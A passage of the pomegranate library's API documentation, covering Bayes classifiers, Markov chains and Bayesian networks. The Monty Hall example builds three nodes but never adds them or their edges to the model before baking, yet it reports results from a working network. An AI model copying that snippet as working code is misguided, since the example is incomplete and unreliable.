classifier is a superset of the naive Bayes classifier in that the math is identical, but the distributions used do not have to be independent for each feature. Simply put, one can create a multivariate Gaussian Bayes classifier with a full covariance matrix, but a Gaussian naive Bayes would require a diagonal covariance matrix.\n\nParameters: distributions : array-like, shape (n_components,) or callable The components of the model. This should either be a single callable if all components will be the same distribution, or an array of callables, one for each feature. X : array-like, shape (n_samples, n_dimensions) This is the data to train on. Each row is a sample, and each column is a dimension to train on. y : array-like, shape (n_samples,) The labels for each sample. The labels should be integers between 0 and k-1 for a problem with k classes, or -1 if the label is not known for that sample. weights : array-like, shape (n_samples,), optional The initial weights of each sample in the matrix. If nothing is passed in then each sample is assumed to be the same weight. Default is None. inertia : double, optional Inertia used for the training the distributions. pseudocount : double, optional A pseudocount to add to the emission of each distribution. This effectively smoothes the states to prevent 0. probability symbols if they don’t happen to occur in the data. Default is 0. stop_threshold : double, optional, positive The threshold at which EM will terminate for the improvement of the model. If the model does not improve its fit of the data by a log probability of 0.1 then terminate. Only required if doing semisupervised learning. Default is 0.1. max_iterations : int, optional, positive The maximum number of iterations to run EM for. If this limit is hit then it will terminate training, regardless of how well the model is improving per iteration. Only required if doing semisupervised learning. Default is 1e8. callbacks : list, optional A list of callback objects that describe functionality that should be undertaken over the course of training. return_history : bool, optional Whether to return the history during training as well as the model. verbose : bool, optional Whether or not to print out improvement information over iterations. Only required if doing semisupervised learning. Default is False. n_jobs : int, optional The number of jobs to use to parallelize, either the number of threads or the number of processes to use. -1 means use all available resources. Default is 1. **kwargs : dict, optional Any arguments to pass into the from_samples methods of other objects that are being created such as BayesianNetworks or HMMs. model : BayesClassifier The fit Bayes classifier model.\nfrom_summaries()\n\nFit the model to the collected sufficient statistics.\n\nFit the parameters of the model to the sufficient statistics gathered during the summarize calls. This should return an exact update.\n\nParameters: inertia : double, optional The weight of the previous parameters of the model. The new parameters will roughly be old_param*inertia + new_param*(1-inertia), so an inertia of 0 means ignore the old parameters, whereas an inertia of 1 means ignore the new parameters. Default is 0.0. pseudocount : double, optional A pseudocount to add to the emission of each distribution. This effectively smoothes the states to prevent 0. probability symbols if they don’t happen to occur in the data. If discrete data, will smooth both the prior probabilities of each component and the emissions of each component. Otherwise, will only smooth the prior probabilities of each component. Default is 0. None\nfrom_yaml()\n\nDeserialize this object from its YAML representation.\n\nlog_probability()\n\nCalculate the log probability of a point under the distribution.\n\nThe probability of a point is the sum of the probabilities of each distribution multiplied by the weights. Thus, the log probability is the sum of the log probability plus the log prior.\n\nThis is the python interface.\n\nParameters: X : numpy.ndarray, shape=(n, d) or (n, m, d) The samples to calculate the log probability of. Each row is a sample and each column is a dimension. If emissions are HMMs then shape is (n, m, d) where m is variable length for each observation, and X becomes an array of n (m, d)-shaped arrays. n_jobs : int, optional The number of jobs to use to parallelize, either the number of threads or the number of processes to use. -1 means use all available resources. Default is 1. batch_size: int or None, optional The size of the batches to make predictions on. Passing in None means splitting the data set evenly among the number of jobs. Default is None. log_probability : double The log probability of the point under the distribution.\npredict()\n\nPredict the most likely component which generated each sample.\n\nCalculate the posterior P(M|D) for each sample and return the index of the component most likely to fit it. This corresponds to a simple argmax over the responsibility matrix.\n\nThis is a sklearn wrapper for the maximum_a_posteriori method.\n\nParameters: X : array-like, shape (n_samples, n_dimensions) The samples to do the prediction on. Each sample is a row and each column corresponds to a dimension in that sample. For univariate distributions, a single array may be passed in. n_jobs : int The number of jobs to use to parallelize, either the number of threads or the number of processes to use. -1 means use all available resources. Default is 1. batch_size: int or None, optional The size of the batches to make predictions on. Passing in None means splitting the data set evenly among the number of jobs. Default is None. y : array-like, shape (n_samples,) The predicted component which fits the sample the best.\npredict_log_proba()\n\nCalculate the posterior log P(M|D) for data.\n\nCalculate the log probability of each item having been generated from each component in the model. This returns normalized log probabilities such that the probabilities should sum to 1\n\nThis is a sklearn wrapper for the original posterior function.\n\nParameters: X : array-like, shape (n_samples, n_dimensions) The samples to do the prediction on. Each sample is a row and each column corresponds to a dimension in that sample. For univariate distributions, a single array may be passed in. n_jobs : int The number of jobs to use to parallelize, either the number of threads or the number of processes to use. -1 means use all available resources. Default is 1. batch_size: int or None, optional The size of the batches to make predictions on. Passing in None means splitting the data set evenly among the number of jobs. Default is None. y : array-like, shape (n_samples, n_components) The normalized log probability log P(M|D) for each sample. This is the probability that the sample was generated from each component.\npredict_proba()\n\nCalculate the posterior P(M|D) for data.\n\nCalculate the probability of each item having been generated from each component in the model. This returns normalized probabilities such that each row should sum to 1.\n\nSince calculating the log probability is much faster, this is just a wrapper which exponentiates the log probability matrix.\n\nParameters: X : array-like, shape (n_samples, n_dimensions) The samples to do the prediction on. Each sample is a row and each column corresponds to a dimension in that sample. For univariate distributions, a single array may be passed in. n_jobs : int The number of jobs to use to parallelize, either the number of threads or the number of processes to use. -1 means use all available resources. Default is 1. batch_size: int or None, optional The size of the batches to make predictions on. Passing in None means splitting the data set evenly among the number of jobs. Default is None. probability : array-like, shape (n_samples, n_components) The normalized probability P(M|D) for each sample. This is the probability that the sample was generated from each component.\nprobability()\n\nReturn the probability of the given symbol under this distribution.\n\nParameters: symbol : object The symbol to calculate the probability of probability : double The probability of that point under the distribution.\nsample()\n\nGenerate a sample from the model.\n\nFirst, randomly select a component weighted by the prior probability, Then, use the sample method from that component to generate a sample.\n\nParameters: n : int, optional The number of samples to generate. Defaults to 1. random_state : int, numpy.random.RandomState, or None The random state used for generating samples. If set to none, a random seed will be used. If set to either an integer or a random seed, will produce deterministic outputs. sample : array-like or object A randomly generated sample from the model of the type modelled by the emissions. An integer if using most distributions, or an array if using multivariate ones, or a string for most discrete distributions. If n=1 return an object, if n>1 return an array of the samples.\nscore()\n\nReturn the accuracy of the model on a data set.\n\nParameters: X : numpy.ndarray, shape=(n, d) The values of the data set y : numpy.ndarray, shape=(n,) The labels of each value\nsummarize()\n\nSummarize data into stored sufficient statistics for out-of-core training.\n\nParameters: X : array-like, shape (n_samples, variable) Array of the samples, which can be either fixed size or variable depending on the underlying components. y : array-like, shape (n_samples,) Array of the known labels as integers weights : array-like, shape (n_samples,) optional Array of the weight of each sample, a positive float None\nthaw()\n\nThaw the distribution, re-allowing updates to occur.\n\nto_json()\n\nSerialize the model to JSON.\n\nParameters: separators : tuple, optional The two separators to pass to the json.dumps function for formatting. Default is (‘,’, ‘ : ‘). indent : int, optional The indentation to use at each level. Passed to json.dumps for formatting. Default is 4. json : str A properly formatted JSON object.\nto_yaml()\n\nSerialize the model to YAML for compactness.\n\n## Markov Chains¶\n\nIPython Notebook Tutorial\n\nMarkov chains are form of structured model over sequences. They represent the probability of each character in the sequence as a conditional probability of the last k symbols. For example, a 3rd order Markov chain would have each symbol depend on the last three symbols. A 0th order Markov chain is a naive predictor where each symbol is independent of all other symbols. Currently pomegranate only supports discrete emission Markov chains where each symbol is a discrete symbol versus a continuous number (like ‘A’ ‘B’ ‘C’ instead of 17.32 or 19.65).\n\n### Initialization¶\n\nMarkov chains can almost be represented by a single conditional probability table (CPT), except that the probability of the first k elements (for a k-th order Markov chain) cannot be appropriately represented except by using special characters. Due to this pomegranate takes in a series of k+1 distributions representing the first k elements. For example for a second order Markov chain:\n\nfrom pomegranate import *\nd1 = DiscreteDistribution({'A': 0.25, 'B': 0.75})\nd2 = ConditionalProbabilityTable([['A', 'A', 0.1],\n['A', 'B', 0.9],\n['B', 'A', 0.6],\n['B', 'B', 0.4]], [d1])\nd3 = ConditionalProbabilityTable([['A', 'A', 'A', 0.4],\n['A', 'A', 'B', 0.6],\n['A', 'B', 'A', 0.8],\n['A', 'B', 'B', 0.2],\n['B', 'A', 'A', 0.9],\n['B', 'A', 'B', 0.1],\n['B', 'B', 'A', 0.2],\n['B', 'B', 'B', 0.8]], [d1, d2])\nmodel = MarkovChain([d1, d2, d3])\n\n\n### Probability¶\n\nThe probability of a sequence under the Markov chain is just the probability of the first character under the first distribution times the probability of the second character under the second distribution and so forth until you go past the (k+1)th character, which remains evaluated under the (k+1)th distribution. We can calculate the probability or log probability in the same manner as any of the other models. Given the model shown before:\n\n>>> model.log_probability(['A', 'B', 'B', 'B'])\n-3.324236340526027\n>>> model.log_probability(['A', 'A', 'A', 'A'])\n-5.521460917862246\n\n\n### Fitting¶\n\nMarkov chains are not very complicated to train. For each sequence the appropriate symbols are sent to the appropriate distributions and maximum likelihood estimates are used to update the parameters of the distributions. There are no latent factors to train and so no expectation maximization or iterative algorithms are needed to train anything.\n\n### API Reference¶\n\nclass pomegranate.MarkovChain.MarkovChain\n\nA Markov Chain.\n\nImplemented as a series of conditional distributions, the Markov chain models P(X_i | X_i-1…X_i-k) for a k-th order Markov network. The conditional dependencies are directly on the emissions, and not on a hidden state as in a hidden Markov model.\n\nParameters: distributions : list, shape (k+1) A list of the conditional distributions which make up the markov chain. Begins with P(X_i), then P(X_i | X_i-1). For a k-th order markov chain you must put in k+1 distributions.\n\nExamples\n\n>>> from pomegranate import *\n>>> d1 = DiscreteDistribution({'A': 0.25, 'B': 0.75})\n>>> d2 = ConditionalProbabilityTable([['A', 'A', 0.33],\n['B', 'A', 0.67],\n['A', 'B', 0.82],\n['B', 'B', 0.18]], [d1])\n>>> mc = MarkovChain([d1, d2])\n>>> mc.log_probability(list('ABBAABABABAABABA'))\n-8.9119890701808213\n\nAttributes: distributions : list, shape (k+1) The distributions which make up the chain.\nfit()\n\nFit the model to new data using MLE.\n\nThe underlying distributions are fed in their appropriate points and weights and are updated.\n\nParameters: sequences : array-like, shape (n_samples, variable) This is the data to train on. Each row is a sample which contains a sequence of variable length weights : array-like, shape (n_samples,), optional The initial weights of each sample. If nothing is passed in then each sample is assumed to be the same weight. Default is None. inertia : double, optional The weight of the previous parameters of the model. The new parameters will roughly be old_param*inertia + new_param*(1-inertia), so an inertia of 0 means ignore the old parameters, whereas an inertia of 1 means ignore the new parameters. Default is 0.0. None\nfrom_json()\n\nRead in a serialized model and return the appropriate classifier.\n\nParameters: s : str A JSON formatted string containing the file. model : object A properly initialized and baked model.\nfrom_samples()\n\nLearn the Markov chain from data.\n\nTakes in the memory of the chain (k) and learns the initial distribution and probability tables associated with the proper parameters.\n\nParameters: X : array-like, list or numpy.array The data to fit the structure too as a list of sequences of variable length. Since the data will be of variable length, there is no set form weights : array-like, shape (n_nodes), optional The weight of each sample as a positive double. Default is None. k : int, optional The number of samples back to condition on in the model. Default is 1. model : MarkovChain The learned markov chain model.\nfrom_summaries()\n\nFit the model to the collected sufficient statistics.\n\nFit the parameters of the model to the sufficient statistics gathered during the summarize calls. This should return an exact update.\n\nParameters: inertia : double, optional The weight of the previous parameters of the model. The new parameters will roughly be old_param*inertia + new_param * (1-inertia), so an inertia of 0 means ignore the old parameters, whereas an inertia of 1 means ignore the new parameters. Default is 0.0. None\nlog_probability()\n\nCalculate the log probability of the sequence under the model.\n\nThis calculates the first slices of increasing size under the corresponding first few components of the model until size k is reached, at which all slices are evaluated under the final component.\n\nParameters: sequence : array-like An array of observations logp : double The log probability of the sequence under the model.\nsample()\n\nCreate a random sample from the model.\n\nParameters: length : int or Distribution Give either the length of the sample you want to generate, or a distribution object which will be randomly sampled for the length. Continuous distributions will have their sample rounded to the nearest integer, minimum 1. sequence : array-like, shape = (length,) A sequence randomly generated from the markov chain.\nsummarize()\n\nSummarize a batch of data and store sufficient statistics.\n\nThis will summarize the sequences into sufficient statistics stored in each distribution.\n\nParameters: sequences : array-like, shape (n_samples, variable) This is the data to train on. Each row is a sample which contains a sequence of variable length weights : array-like, shape (n_samples,), optional The initial weights of each sample. If nothing is passed in then each sample is assumed to be the same weight. Default is None. None\nto_json()\n\nSerialize the model to a JSON.\n\nParameters: separators : tuple, optional The two separators to pass to the json.dumps function for formatting. Default is (‘,’, ‘ : ‘). indent : int, optional The indentation to use at each level. Passed to json.dumps for formatting. Default is 4. json : str A properly formatted JSON object.\n\n## Bayesian Networks¶\n\nBayesian networks are a probabilistic model that are especially good at inference given incomplete data. Much like a hidden Markov model, they consist of a directed graphical model (though Bayesian networks must also be acyclic) and a set of probability distributions. The edges encode dependency statements between the variables, where the lack of an edge between any pair of variables indicates a conditional independence. Each node encodes a probability distribution, where root nodes encode univariate probability distributions and inner/leaf nodes encode conditional probability distributions. Bayesian networks are exceptionally flexible when doing inference, as any subset of variables can be observed, and inference done over all other variables, without needing to define these groups in advance. In fact, the set of observed variables can change from one sample to the next without needing to modify the underlying algorithm at all.\n\nCurrently, pomegranate only supports discrete Bayesian networks, meaning that the values must be categories, i.e. ‘apples’ and ‘oranges’, or 1 and 2, where 1 and 2 refer to categories, not numbers, and so 2 is not explicitly ‘bigger’ than 1.\n\n### Initialization¶\n\nBayesian networks can be initialized in two ways, depending on whether the underlying graphical structure is known or not: (1) the graphical structure can be built one node at a time with pre-initialized distributions set for each node, or (2) both the graphical structure and distributions can be learned directly from data. This mirrors the other models that are implemented in pomegranate. However, typically expectation maximization is used to fit the parameters of the distribution, and so initialization (such as through k-means) is typically fast whereas fitting is slow. For Bayesian networks, the opposite is the case. Fitting can be done quickly by just summing counts through the data, while initialization is hard as it requires an exponential time search through all possible DAGs to identify the optimal graph. More is discussed in the tutorials above and in the fitting section below.\n\nLet’s take a look at initializing a Bayesian network in the first manner by quickly implementing the Monty Hall problem. The Monty Hall problem arose from the gameshow Let’s Make a Deal, where a guest had to choose which one of three doors had a prize behind it. The twist was that after the guest chose, the host, originally Monty Hall, would then open one of the doors the guest did not pick and ask if the guest wanted to switch which door they had picked. Initial inspection may lead you to believe that if there are only two doors left, there is a 50-50 chance of you picking the right one, and so there is no advantage one way or the other. However, it has been proven both through simulations and analytically that there is in fact a 66% chance of getting the prize if the guest switches their door, regardless of the door they initially went with.\n\nOur network will have three nodes, one for the guest, one for the prize, and one for the door Monty chooses to open. The door the guest initially chooses and the door the prize is behind are uniform random processes across the three doors, but the door which Monty opens is dependent on both the door the guest chooses (it cannot be the door the guest chooses), and the door the prize is behind (it cannot be the door with the prize behind it).\n\nfrom pomegranate import *\n\nguest = DiscreteDistribution({'A': 1./3, 'B': 1./3, 'C': 1./3})\nprize = DiscreteDistribution({'A': 1./3, 'B': 1./3, 'C': 1./3})\nmonty = ConditionalProbabilityTable(\n[['A', 'A', 'A', 0.0],\n['A', 'A', 'B', 0.5],\n['A', 'A', 'C', 0.5],\n['A', 'B', 'A', 0.0],\n['A', 'B', 'B', 0.0],\n['A', 'B', 'C', 1.0],\n['A', 'C', 'A', 0.0],\n['A', 'C', 'B', 1.0],\n['A', 'C', 'C', 0.0],\n['B', 'A', 'A', 0.0],\n['B', 'A', 'B', 0.0],\n['B', 'A', 'C', 1.0],\n['B', 'B', 'A', 0.5],\n['B', 'B', 'B', 0.0],\n['B', 'B', 'C', 0.5],\n['B', 'C', 'A', 1.0],\n['B', 'C', 'B', 0.0],\n['B', 'C', 'C', 0.0],\n['C', 'A', 'A', 0.0],\n['C', 'A', 'B', 1.0],\n['C', 'A', 'C', 0.0],\n['C', 'B', 'A', 1.0],\n['C', 'B', 'B', 0.0],\n['C', 'B', 'C', 0.0],\n['C', 'C', 'A', 0.5],\n['C', 'C', 'B', 0.5],\n['C', 'C', 'C', 0.0]], [guest, prize])\n\ns1 = Node(guest, name=\"guest\")\ns2 = Node(prize, name=\"prize\")\ns3 = Node(monty, name=\"monty\")\n\nmodel = BayesianNetwork(\"Monty Hall Problem\")\nmodel.bake()\n\n\nNote\n\nThe objects ‘state’ and ‘node’ are really the same thing and can be used interchangeable. The only difference is the name, as hidden Markov models use ‘state’ in the literature frequently whereas Bayesian networks use ‘node’ frequently.\n\nThe conditional distribution must be explicitly spelled out in this example, followed by a list of the parents in the same order as the columns take in the table that is provided (e.g. the columns in the table correspond to guest, prize, monty, probability.)\n\nHowever, one can also initialize a Bayesian network based completely on data. As mentioned before, the exact version of this algorithm takes exponential time with the number of variables and typically can’t be done on more than ~25 variables. This is because there are a super-exponential number of directed acyclic graphs that one could define over a set of variables, but fortunately one can use dynamic programming in order to reduce this complexity down to “simply exponential.” The implementation of the exact algorithm actually goes further than the original dynamic programming algorithm by implementing an A* search to somewhat reduce computational time but drastically reduce required memory, sometimes by an order of magnitude.\n\nfrom pomegranate import *\nimport numpy\n\nmodel = BayesianNetwork.from_samples(X, algorithm='exact')\n\n\nThe exact algorithm is not the default, though. The default is a novel greedy algorithm that greedily chooses a topological ordering of the variables, but optimally identifies the best parents for each variable given this ordering. It is significantly faster and more memory efficient than the exact algorithm and produces far better estimates than using a Chow-Liu tree. This is set to the default to avoid locking up the computers of users that unintentionally tell their computers to do a near-impossible task.\n\n### Probability¶\n\nYou can calculate the probability of a sample under a Bayesian network as the product of the probability of each variable given its parents, if it has any. This can be expressed as $$P = \\prod\\limits_{i=1}^{d} P(D_{i}|Pa_{i})$$ for a sample with $d$ dimensions. For example, in the Monty Hal problem, the probability of a show is the probability of the guest choosing the respective door, times the probability of the prize being behind a given door, times the probability of Monty opening a given door given the previous two values. For example, using the manually initialized network above:\n\n>>> print(model.probability([['A', 'A', 'A'],\n['A', 'A', 'B'],\n['C', 'C', 'B']]))\n[ 0. 0.05555556 0.05555556]\n\n\n### Prediction¶\n\nBayesian networks are frequently used to infer/impute the value of missing variables given the observed values. In other models, typically there is either a single or fixed set of missing variables, such as latent factors, that need to be imputed, and so returning a fixed vector or matrix as the predictions makes sense. However, in the case of Bayesian networks, we can make no such assumptions, and so when data is passed in for prediction it should be in the format as a matrix with None in the missing variables that need to be inferred. The return is thus a filled in matrix where the Nones have been replaced with the imputed values. For example:\n\n>>> print(model.predict([['A', 'B', None],\n['A', 'C', None],\n['C', 'B', None]]))\n[['A' 'B' 'C']\n['A' 'C' 'B']\n['C' 'B' 'A']]\n\n\nIn this example, the final column is the one that is always missing, but a more complex example is as follows:\n\n>>> print(model.predict([['A', 'B', None],\n['A', None, 'C'],\n[None, 'B', 'A']]))\n[['A' 'B' 'C']\n['A' 'B' 'C']\n['C' 'B' 'A']]\n\n\n### Fitting¶\n\nFitting a Bayesian network to data is a fairly simple process. Essentially, for each variable, you need consider only that column of data and the columns corresponding to that variables parents. If it is a univariate distribution, then the maximum likelihood estimate is just the count of each symbol divided by the number of samples in the data. If it is a multivariate distribution, it ends up being the probability of each symbol in the variable of interest given the combination of symbols in the parents. For example, consider a binary dataset with two variables, X and Y, where X is a parent of Y. First, we would go through the dataset and calculate P(X=0) and P(X=1). Then, we would calculate P(Y=0|X=0), P(Y=1|X=0), P(Y=0|X=1), and P(Y=1|X=1). Those values encode all of the parameters of the Bayesian network.\n\n### API Reference¶\n\nclass pomegranate.BayesianNetwork.BayesianNetwork\n\nA Bayesian Network Model.\n\nA Bayesian network is a directed graph where nodes represent variables, edges represent conditional dependencies of the children on their parents, and the lack of an edge represents a conditional independence.\n\nParameters: name : str, optional The name of the model. Default is None states : list, shape (n_states,) A list of all the state objects in the model graph : networkx.DiGraph The underlying graph object.\nadd_edge()\n\nAdd a transition from state a to state b which indicates that B is dependent on A in ways specified by the distribution.\n\nadd_node()\n\nAdd a node to the graph.\n\nadd_nodes()\n\nAdd multiple states to the graph.\n\nadd_state()\n\nAnother name for a node.\n\nadd_states()\n\nAnother name for a node.\n\nadd_transition()\n\nTransitions and edges are the same.\n\nbake()\n\nFinalize the topology of the model.\n\nAssign a numerical index to every state and create the underlying arrays corresponding to the states and edges between the states. This method must be called before any of the probability-calculating methods. This includes converting conditional probability tables into joint probability tables and creating a list of both marginal and table nodes.\n\nParameters: None None\nclear_summaries()\n\nClear the summary statistics stored in the object.\n\ncopy()\n\nReturn a deep copy of this distribution object.\n\nThis object will not be tied to any other distribution or connected in any form.\n\nParameters: None distribution : Distribution A copy of the distribution with the same parameters.\ndense_transition_matrix()\n\nReturns the dense transition matrix. Useful if the transitions of somewhat small models need to be analyzed.\n\nedge_count()\n\nReturns the number of edges present in the model.\n\nfit()\n\nFit the model to data using MLE estimates.\n\nFit the model to the data by updating each of the components of the model, which are univariate or multivariate distributions. This uses a simple MLE estimate to update the distributions according to their summarize or fit methods.\n\nThis is a wrapper for the summarize and from_summaries methods.\n\nParameters: X : array-like or generator, shape (n_samples, n_nodes) The data to train on, where each row is a sample and each column corresponds to the associated variable. weights : array-like, shape (n_nodes), optional The weight of each sample as a positive double. Default is None. inertia : double, optional The inertia for updating the distributions, passed along to the distribution method. Default is 0.0. pseudocount : double, optional A pseudocount to add to the emission of each distribution. This effectively smoothes the states to prevent 0. probability symbols if they don’t happen to occur in the data. Only effects hidden Markov models defined over discrete distributions. Default is 0. verbose : bool, optional Whether or not to print out improvement information over iterations. Only required if doing semisupervised learning. Default is False. n_jobs : int The number of jobs to use to parallelize, either the number of threads or the number of processes to use. -1 means use all available resources. Default is 1. self : BayesianNetwork The fit Bayesian network object with updated model parameters.\nfreeze()\n\nFreeze the distribution, preventing updates from occurring.\n\nfrom_json()\n\nRead in a serialized Bayesian Network and return the appropriate object.\n\nParameters: s : str A JSON formatted string containing the file. model : object A properly initialized and baked model.\nfrom_samples()\n\nLearn the structure of the network from data.\n\nFind the structure of the network from data using a Bayesian structure learning score. This currently enumerates all the exponential number of structures and finds the best according to the score. This allows weights on the different samples as well. The score that is optimized is the minimum description length (MDL).\n\nIf not all states for a variable appear in the supplied data, this function can not gurantee that the returned Bayesian Network is optimal when ‘exact’ or ‘exact-dp’ is used. This is because the number of states for each node is derived only from the data provided, and the scoring function depends on the number of states of a variable.\n\nParameters: X : array-like or generator, shape (n_samples, n_nodes) The data to fit the structure too, where each row is a sample and each column corresponds to the associated variable. weights : array-like, shape (n_nodes), optional The weight of each sample as a positive double. Default is None. algorithm : str, one of ‘chow-liu’, ‘greedy’, ‘exact’, ‘exact-dp’ optional The algorithm to use for learning the Bayesian network. Default is ‘greedy’ that greedily attempts to find the best structure, and frequently can identify the optimal structure. ‘exact’ uses DP/A* to find the optimal Bayesian network, and ‘exact-dp’ tries to find the shortest path on the entire order lattice, which is more memory and computationally expensive. ‘exact’ and ‘exact-dp’ should give identical results, with ‘exact-dp’ remaining an option mostly for debugging reasons. ‘chow-liu’ will return the optimal tree-like structure for the Bayesian network, which is a very fast approximation but not always the best network. max_parents : int, optional The maximum number of parents a node can have. If used, this means using the k-learn procedure. Can drastically speed up algorithms. If -1, no max on parents. Default is -1. root : int, optional For algorithms which require a single root (‘chow-liu’), this is the root for which all edges point away from. User may specify which column to use as the root. Default is the first column. constraint_graph : networkx.DiGraph or None, optional A directed graph showing valid parent sets for each variable. Each node is a set of variables, and edges represent which variables can be valid parents of those variables. The naive structure learning task is just all variables in a single node with a self edge, meaning that you know nothing about pseudocount : double, optional A pseudocount to add to the emission of each distribution. This effectively smoothes the states to prevent 0. probability symbols if they don’t happen to occur in the data. Default is 0. state_names : array-like, shape (n_nodes), optional A list of meaningful names to be applied to nodes name : str, optional The name of the model. Default is None. reduce_dataset : bool, optional Given the discrete nature of these datasets, frequently a user will pass in a dataset that has many identical samples. It is time consuming to go through these redundant samples and a far more efficient use of time to simply calculate a new dataset comprised of the subset of unique observed samples weighted by the number of times they occur in the dataset. This typically will speed up all algorithms, including when using a constraint graph. Default is True. n_jobs : int, optional The number of threads to use when learning the structure of the network. If a constraint graph is provided, this will parallelize the tasks as directed by the constraint graph. If one is not provided it will parallelize the building of the parent graphs. Both cases will provide large speed gains. model : BayesianNetwork The learned BayesianNetwork.\nfrom_structure()\n\nReturn a Bayesian network from a predefined structure.\n\nPass in the structure of the network as a tuple of tuples and get a fit network in return. The tuple should contain n tuples, with one for each node in the graph. Each inner tuple should be of the parents for that node. For example, a three node graph where both node 0 and 1 have node 2 as a parent would be specified as ((2,), (2,), ()).\n\nParameters: X : array-like, shape (n_samples, n_nodes) The data to fit the structure too, where each row is a sample and each column corresponds to the associated variable. structure : tuple of tuples The parents for each node in the graph. If a node has no parents, then do not specify any parents. weights : array-like, shape (n_nodes), optional The weight of each sample as a positive double. Default is None. pseudocount : double, optional A pseudocount to add to the emission of each distribution. This effectively smoothes the states to prevent 0. probability symbols if they don’t happen to occur in the data. Default is 0. name : str, optional The name of the model. Default is None. state_names : array-like, shape (n_nodes), optional A list of meaningful names to be applied to nodes model : BayesianNetwork A Bayesian network with the specified structure.\nfrom_summaries()\n\nUse MLE on the stored sufficient statistics to train the model.\n\nThis uses MLE estimates on the stored sufficient statistics to train the model.\n\nParameters: inertia : double, optional The inertia for updating the distributions, passed along to the distribution method. Default is 0.0. pseudocount : double, optional A pseudocount to add to the emission of each distribution. This effectively smoothes the states to prevent 0. probability symbols if they don’t happen to occur in the data. Default is 0. None\nfrom_yaml()\n\nDeserialize this object from its YAML representation.\n\nlog_probability()\n\nReturn the log probability of samples under the Bayesian network.\n\nThe log probability is just the sum of the log probabilities under each of the components. The log probability of a sample under the graph A -> B is just P(A)*P(B|A). This will return a vector of log probabilities, one for each sample.\n\nParameters: X : array-like, shape (n_samples, n_dim) The sample is a vector of points where each dimension represents the same variable as added to the graph originally. It doesn’t matter what the connections between these variables are, just that they are all ordered the same. n_jobs : int The number of jobs to use to parallelize, either the number of threads or the number of processes to use. -1 means use all available resources. Default is 1. logp : numpy.ndarray or double The log probability of the samples if many, or the single log probability.\nmarginal()\n\nReturn the marginal probabilities of each variable in the graph.\n\nThis is equivalent to a pass of belief propagation on a graph where no data has been given. This will calculate the probability of each variable being in each possible emission when nothing is known.\n\nParameters: None marginals : array-like, shape (n_nodes) An array of univariate distribution objects showing the marginal probabilities of that variable.\nnode_count()\n\nReturns the number of nodes/states in the model\n\nplot()\n\nDraw this model’s graph using pygraphviz.\n\nReturns: None\npredict()\n\nPredict missing values of a data matrix using MLE.\n\nImpute the missing values of a data matrix using the maximally likely predictions according to the forward-backward algorithm. Run each sample through the algorithm (predict_proba) and replace missing values with the maximally likely predicted emission.\n\nParameters: X : array-like, shape (n_samples, n_nodes) Data matrix to impute. Missing values must be either None (if lists) or np.nan (if numpy.ndarray). Will fill in these values with the maximally likely ones. max_iterations : int, optional Number of iterations to run loopy belief propagation for. Default is 100. check_input : bool, optional Check to make sure that the observed symbol is a valid symbol for that distribution to produce. Default is True. n_jobs : int The number of jobs to use to parallelize, either the number of threads or the number of processes to use. -1 means use all available resources. Default is 1. y_hat : numpy.ndarray, shape (n_samples, n_nodes) This is the data matrix with the missing values imputed.\npredict_proba()\n\nReturns the probabilities of each variable in the graph given evidence.\n\nThis calculates the marginal probability distributions for each state given the evidence provided through loopy belief propagation. Loopy belief propagation is an approximate algorithm which is exact for certain graph structures.\n\nParameters: X : dict or array-like, shape <= n_nodes The evidence supplied to the graph. This can either be a dictionary with keys being state names and values being the observed values (either the emissions or a distribution over the emissions) or an array with the values being ordered according to the nodes incorporation in the graph (the order fed into .add_states/add_nodes) and None for variables which are unknown. It can also be vectorized, so a list of dictionaries can be passed in where each dictionary is a single sample, or a list of lists where each list is a single sample, both formatted as mentioned before. max_iterations : int, optional The number of iterations with which to do loopy belief propagation. Usually requires only 1. Default is 100. check_input : bool, optional Check to make sure that the observed symbol is a valid symbol for that distribution to produce. Default is True. n_jobs : int, optional The number of threads to use when parallelizing the job. This parameter is passed directly into joblib. Default is 1, indicating no parallelism. y_hat : array-like, shape (n_samples, n_nodes) An array of univariate distribution objects showing the probabilities of each variable.\nprobability()\n\nReturn the probability of the given symbol under this distribution.\n\nParameters: symbol : object The symbol to calculate the probability of probability : double The probability of that point under the distribution.\nsample()\n\nReturn a random item sampled from this distribution.\n\nParameters: n : int or None, optional The number of samples to return. Default is None, which is to generate a single sample. sample : double or object Returns a sample from the distribution of a type in the support of the distribution.\nscore()\n\nReturn the accuracy of the model on a data set.\n\nParameters: X : numpy.ndarray, shape=(n, d) The values of the data set y : numpy.ndarray, shape=(n,) The labels of each value\nstate_count()\n\nReturns the number of states present in the model.\n\nsummarize()\n\nSummarize a batch of data and store the sufficient statistics.\n\nThis will partition the dataset into columns which belong to their appropriate distribution. If the distribution has parents, then multiple columns are sent to the distribution. This relies mostly on the summarize function of the underlying distribution.\n\nParameters: X : array-like, shape (n_samples, n_nodes) The data to train on, where each row is a sample and each column corresponds to the associated variable. weights : array-like, shape (n_nodes), optional The weight of each sample as a positive double. Default is None. None\nthaw()\n\nThaw the distribution, re-allowing updates to occur.\n\nto_json()\n\nSerialize the model to a JSON.\n\nParameters: separators : tuple, optional The two separators to pass to the json.dumps function for formatting. indent : int, optional The indentation to use at each level. Passed to json.dumps for formatting. json : str A properly formatted JSON object.\nto_yaml()\n\nSerialize the model to YAML for compactness.\n\nclass pomegranate.BayesianNetwork.ParentGraph\n\nGenerate a parent graph for a single variable over its parents.\n\nThis will generate the parent graph for a single parents given the data. A parent graph is the dynamically generated best parent set and respective score for each combination of parent variables. For example, if we are generating a parent graph for x1 over x2, x3, and x4, we may calculate that having x2 as a parent is better than x2,x3 and so store the value of x2 in the node for x2,x3.\n\nParameters: X : numpy.ndarray, shape=(n, d) The data to fit the structure too, where each row is a sample and each column corresponds to the associated variable. weights : numpy.ndarray, shape=(n,) The weight of each sample as a positive double. Default is None. key_count : numpy.ndarray, shape=(d,) The number of unique keys in each column. pseudocount : double A pseudocount to add to each possibility. max_parents : int The maximum number of parents a node can have. If used, this means using the k-learn procedure. Can drastically speed up algorithms. If -1, no max on parents. Default is -1. parent_set : tuple, default () The variables which are possible parents for this variable. If nothing is passed in then it defaults to all other variables, as one would expect in the naive case. This allows for cases where we want to build a parent graph over only a subset of the variables. structure : tuple, shape=(d,) The parents for each variable in this SCC\npomegranate.BayesianNetwork.discrete_exact_a_star()\n\nFind the optimal graph over a set of variables with no other knowledge.\n\nThis is the naive dynamic programming structure learning task where the optimal graph is identified from a set of variables using an order graph and parent graphs. This can be used either when no constraint graph is provided or for a SCC which is made up of a node containing a self-loop. It uses DP/A* in order to find the optimal graph without considering all possible topological sorts. A greedy version of the algorithm can be used that massively reduces both the computational and memory cost while frequently producing the optimal 